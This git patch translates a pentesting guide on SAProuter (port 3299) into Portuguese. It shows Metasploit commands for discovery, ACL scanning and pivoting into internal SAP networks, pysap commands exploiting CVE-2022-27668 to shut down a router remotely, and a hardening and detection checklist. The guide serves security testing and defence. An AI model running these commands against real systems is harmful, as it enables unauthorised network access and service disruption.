From e8fd656218bbdf89741f9e766ab86c98fa1b2157 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 14 Aug 2025 06:15:57 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/3299-pentesting-saprouter.m --- .../3299-pentesting-saprouter.md | 73 +++++++++++++++++-- 1 file changed, 68 insertions(+), 5 deletions(-) diff --git a/src/network-services-pentesting/3299-pentesting-saprouter.md b/src/network-services-pentesting/3299-pentesting-saprouter.md index 5d523deee..dd20aaa83 100644 --- a/src/network-services-pentesting/3299-pentesting-saprouter.md +++ b/src/network-services-pentesting/3299-pentesting-saprouter.md @@ -1,3 +1,5 @@ +# # 3299/tcp - Pentesting SAProuter + {{#include ../banners/hacktricks-training.md}} ```text PORT STATE SERVICE VERSION @@ -7,11 +9,11 @@ Este é um resumo do post de [https://blog.rapid7.com/2014/01/09/piercing-saprou ## Compreendendo a Penetração do SAProuter com Metasploit -O SAProuter atua como um proxy reverso para sistemas SAP, principalmente para controlar o acesso entre a internet e redes internas SAP. Ele é comumente exposto à internet permitindo a passagem da porta TCP 3299 através dos firewalls organizacionais. Essa configuração torna o SAProuter um alvo atraente para pentesting, pois pode servir como um gateway para redes internas de alto valor. +O SAProuter atua como um proxy reverso para sistemas SAP, principalmente para controlar o acesso entre a internet e redes internas SAP. Ele é comumente exposto à internet permitindo a passagem da porta TCP 3299 através de firewalls organizacionais. Essa configuração torna o SAProuter um alvo atraente para pentesting, pois pode servir como um gateway para redes internas de alto valor. **Escaneamento e Coleta de Informações** -Inicialmente, um escaneamento é realizado para identificar se um roteador SAP está em execução em um determinado IP usando o módulo **sap_service_discovery**. Esta etapa é crucial para estabelecer a presença de um roteador SAP e sua porta aberta. +Inicialmente, um escaneamento é realizado para identificar se um SAP router está em execução em um determinado IP usando o módulo **sap_service_discovery**. Esta etapa é crucial para estabelecer a presença de um SAP router e sua porta aberta. ```text msf> use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101 @@ -34,7 +36,7 @@ A flexibilidade deste módulo em direcionar instâncias e portas SAP específica **Enumeração Avançada e Mapeamento de ACL** -Escaneamentos adicionais podem revelar como as Listas de Controle de Acesso (ACLs) estão configuradas no SAProuter, detalhando quais conexões são permitidas ou bloqueadas. Esta informação é fundamental para entender as políticas de segurança e as potenciais vulnerabilidades. +A varredura adicional pode revelar como as Listas de Controle de Acesso (ACLs) estão configuradas no SAProuter, detalhando quais conexões são permitidas ou bloqueadas. Esta informação é fundamental para entender as políticas de segurança e as potenciais vulnerabilidades. ```text msf auxiliary(sap_router_portscanner) > set MODE TCP msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN @@ -45,7 +47,7 @@ Em cenários onde as informações diretas do SAProuter são limitadas, técnica **Aproveitando Informações para Testes de Penetração** -Após mapear a rede e identificar serviços acessíveis, os testadores de penetração podem utilizar as capacidades de proxy do Metasploit para pivotar através do SAProuter para uma exploração e exploração adicionais de serviços SAP internos. +Tendo mapeado a rede e identificado serviços acessíveis, os testadores de penetração podem utilizar as capacidades de proxy do Metasploit para pivotar através do SAProuter para uma exploração e exploração adicionais de serviços SAP internos. ```text msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18 @@ -55,11 +57,72 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run Esta abordagem destaca a importância de configurações seguras do SAProuter e ressalta o potencial de acesso a redes internas por meio de testes de penetração direcionados. Proteger adequadamente os roteadores SAP e entender seu papel na arquitetura de segurança da rede é crucial para proteger contra acessos não autorizados. -Para informações mais detalhadas sobre módulos do Metasploit e seu uso, visite [Rapid7's database](http://www.rapid7.com/db). +Para informações mais detalhadas sobre módulos do Metasploit e seu uso, visite [o banco de dados da Rapid7](http://www.rapid7.com/db). + +--- + +## Vulnerabilidades Recentes (2022-2025) + +### CVE-2022-27668 – Controle de Acesso Inadequado ➜ Execução Remota de Comandos Administrativos + +Em junho de 2022, a SAP lançou a Nota de Segurança **3158375** abordando uma falha crítica (CVSS 9.8) no SAProuter (todos os kernels ≥ 7.22). Um atacante não autenticado pode abusar de entradas permissivas `saprouttab` para **enviar pacotes de administração** (por exemplo, *shutdown*, *trace-level*, *connection-kill*) de um host remoto, mesmo quando o roteador foi iniciado sem a opção de administração remota `-X`. + +O problema resulta da possibilidade de construir um túnel para a própria interface de loopback do roteador, direcionando-se para o endereço não especificado **0.0.0.0**. Uma vez que o túnel é estabelecido, o atacante ganha privilégios de host local e pode executar qualquer comando administrativo. + +A exploração prática pode ser reproduzida com o framework **pysap**: +```bash +# 1. Build a loopback tunnel through the vulnerable SAProuter +python router_portfw.py -d -p 3299 \ +-t 0.0.0.0 -r 3299 \ +-a 127.0.0.1 -l 3299 -v + +# 2. Send an admin packet (here: stop the remote router) +python router_admin.py -s -d 127.0.0.1 -p 3299 +``` +**Versões afetadas** + +* SAProuter autônomo 7.22 / 7.53 +* Kernel 7.49, 7.77, 7.81, 7.85–7.88 (incl. KRNL64NUC/UC) + +**Correção / Mitigação** + +1. Aplique o patch entregue com a Nota SAP **3158375**. +2. Remova alvos curinga (`*`) das linhas `P` e `S` em `saprouttab`. +3. Certifique-se de que o roteador seja iniciado **sem** a opção `-X` e **não** esteja exposto diretamente à Internet. + +--- + +## Ferramentas & Truques Atualizados + +* **pysap** – mantido ativamente e fornece `router_portfw.py`, `router_admin.py` & `router_trace.py` para criar pacotes NI/Roteador personalizados, fuzzing de ACLs ou automatizar a exploração do CVE-2022-27668. +* **Nmap** – estenda a detecção de serviços adicionando a sonda SAProuter personalizada: + +```text +Probe TCP SAProuter q|\x00\x00\x00\x00| +ports 3299 +match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/ +``` + +Combine com scripts NSE ou `--script=banner` para identificar rapidamente versões que vazam a string do banner (`SAProuter on ''`). +* **Metasploit** – os módulos auxiliares mostrados acima ainda funcionam através de um proxy SOCKS ou NI criado com pysap, permitindo integração total com o framework mesmo quando o roteador bloqueia o acesso direto. + +--- + +## Lista de Verificação de Dureza & Detecção + +* Filtre a porta **3299/TCP** no firewall de perímetro – permita tráfego apenas de redes de suporte SAP confiáveis. +* Mantenha o SAProuter **totalmente atualizado**; verifique com `saprouter -v` e compare com o nível de patch do kernel mais recente. +* Use entradas **estritas e específicas para o host** em `saprouttab`; evite curingas `*` e negue regras `P`/`S` que visem hosts ou portas arbitrárias. +* Inicie o serviço com **`-S ` + SNC** para impor criptografia e autenticação mútua. +* Desative a administração remota (`-X`) e, se possível, vincule o listener a `127.0.0.1` enquanto usa um proxy reverso externo para o tráfego necessário. +* Monitore o log **dev_rout** para pacotes `ROUTER_ADM` suspeitos ou solicitações `NI_ROUTE` inesperadas para `0.0.0.0`. + +--- ## **Referências** - [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/) +- [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/) ## Shodan